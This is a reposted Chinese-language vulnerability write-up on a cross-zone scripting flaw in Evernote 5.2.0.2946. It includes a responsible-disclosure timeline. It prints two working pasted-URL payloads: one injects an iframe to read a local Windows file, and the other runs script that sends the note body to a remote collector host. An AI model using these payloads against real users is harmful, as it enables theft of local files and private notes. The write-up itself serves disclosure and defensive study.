Found by:pnig0s
App Name:Evernote
Version:5.2.0.2946
Vulnerability:Cross zone scripting
0×01 漏洞描述:
测试时当前版本已是最新版,在正文超级链接处存在跨域脚本攻击漏洞,当用户粘贴恶意的URL到Evernote中时,可能会造成本地文件内容泄露,同时有可能将私密的笔记内容泄露给远程的攻击者。
0×02 测试过程:
我们建立一篇测试的笔记,分割线中间的部分为私密笔记的内容。
复制测试Payload并粘贴于笔记正文处,按下回车,Evernote会自动给链接添加超链接:
http://www.baidu.com/#'”/><iframe/src=”file:\\\C:\Windows\win.ini”></iframe>
此时切换到其他笔记,再切回该笔记时,会发现我们的恶意代码被触发,本地内容被读取。
我们可以将Payload换为以下内容:
http://www.baidu.com/#'”/><script>document.onreadystatechange=function(){if(document.readyState==’complete’){html=”<img/src=’http://xxx.com/recv.php?a=”+document.body.innerHTML+”‘>”;document.write(html);}};</script>
私密的笔记内容会被发送到远端。
0×03 时间轴:
20140303:提交漏洞至Evernote安全团队
20140305:收到漏洞重复的回复:(
转自:http://www.pnigos.com/?p=240
转载请注明:jinglingshu的博客 » Write-up:Evernote cross zone scripting vulnerability